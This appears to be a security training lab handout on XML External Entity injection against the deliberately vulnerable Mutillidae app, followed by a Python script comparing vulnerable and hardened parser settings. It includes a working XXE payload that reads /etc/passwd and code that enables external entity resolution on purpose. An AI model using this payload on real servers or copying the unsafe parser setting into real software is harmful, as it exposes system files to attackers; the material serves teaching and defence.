Module 5 XML External Entities (XXE) Lab: Brought To You by

The document describes an XML External Entities (XXE) lab that demonstrates how external entities in XML can be used to access files on a system that a user normally would not have access to. The lab steps have students log into a virtual machine, navigate to an XXE vulnerability in a web application, and execute a command that reads and displays the contents of the /etc/passwd file by defining it as an external entity in the XML.

Uploaded by Taha Khan
Module 5 XML External Entities (XXE) Lab

Description: In this lab, you will identify and exploit simple examples of XXE in a web application. Entities in XML documents allow a developer to break the document into parts, which makes it more modular. If a user is allowed to influence the declaration of these entities, it might allow the user to access files that they would not normally have access to.

Requirements: You will need access to the Cybrary lab environment for this lab.

Step 1: Log into Cybrary.

Step 2: Launch the OWASP XML External Entities lab by searching for it in the catalog and selecting the launch button. Note: It may take 30-40 seconds for the lab to launch after clicking the button.

Step 3: When the lab opens, you will see a pop-up box. Select the Next button, then Ok to close the pop-up box.

Step 4: You will then be taken to the Kali Linux login screen.

Step 5: Enter a username of student and a password of student to log into the desktop.

Step 6: Next, launch Firefox by clicking on the orange-colored icon near the top-left of the screen. This will open the Mutillidae page.

Step 7: Next, navigate to OWASP 2017, then A4 – XML External Entities, then XML External Entity Injection, then XML Validator.

Step 8: Next, type the following into the "XML" box and click the Validate XML button. Double-check what you are typing so the command runs successfully.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE example [
<!ELEMENT attack ANY >
<!ENTITY xxe SYSTEM "/etc/passwd" >
]>
<attack>&xxe;</attack>

Brought to you by: Develop your team with the fastest growing catalog in the cybersecurity industry. Enterprise-grade workforce development management, advanced training features and detailed skill gap and competency analytics.

Question 1: Do you see the contents of the /etc/passwd file after running the command?
_____________________________________________________________________

Note: If we knew more file paths on the server, we could use the same command to view those files. However, since the data is passed through the XML parser, we cannot retrieve files containing XML, HTML, or binary data without the parser returning an error message.
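As an added example (not part of the Cybrary lab or Mutillidae), the Python script below runs the Step 8 payload through the standard library SAX parser twice: once with external general entities enabled, which is the vulnerable configuration, and once with them disabled, which is the hardened one. It points the SYSTEM identifier at a constructed temporary file instead of /etc/passwd, and the second run in the usage note reproduces the parser error the Note above describes; PAYLOAD, parse_payload and compare_configs are names chosen for this example.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# The lab's payload with the SYSTEM identifier parameterised, so the example
# reads a constructed temp file instead of /etc/passwd.
PAYLOAD = (
    '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
    '<!DOCTYPE example [\n'
    '<!ELEMENT attack ANY >\n'
    '<!ENTITY xxe SYSTEM "{path}" >\n'
    ']>\n'
    '<attack>&xxe;</attack>\n'
)

class TextCollector(ContentHandler):
    """Collects the character data the parser delivers inside <attack>."""
    def __init__(self):
        super().__init__()
        self.chunks = []
    def characters(self, content):
        self.chunks.append(content)

def parse_payload(target_path, resolve_external):
    """resolve_external=True is the vulnerable setting (external general
    entities are fetched and expanded); False is the hardened one. Returns
    the text inside <attack>, or None if the parser rejected the document."""
    xml_bytes = PAYLOAD.format(path=target_path).encode("latin-1")
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    collector = TextCollector()
    parser.setContentHandler(collector)
    try:
        parser.parse(io.BytesIO(xml_bytes))
    except xml.sax.SAXParseException:
        return None
    return "".join(collector.chunks)

def compare_configs(file_contents):
    """Write constructed sample data to a temp file and run the payload
    against it with both settings: (vulnerable_result, hardened_result)."""
    with tempfile.NamedTemporaryFile("w", delete=False) as f:
        f.write(file_contents)
        path = f.name
    try:
        return parse_payload(path, True), parse_payload(path, False)
    finally:
        os.unlink(path)
```

Calling compare_configs("root:x:0:0:root:/root:/bin/bash\n") returns the passwd-style line for the vulnerable run and an empty string for the hardened run, while compare_configs("Tom & Jerry < Spike\n") returns None for the vulnerable run because the file is not well-formed entity content, which is the limitation the Note describes. Recent Python releases leave external general entities disabled by default; the script enables them only to show the unsafe behaviour.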
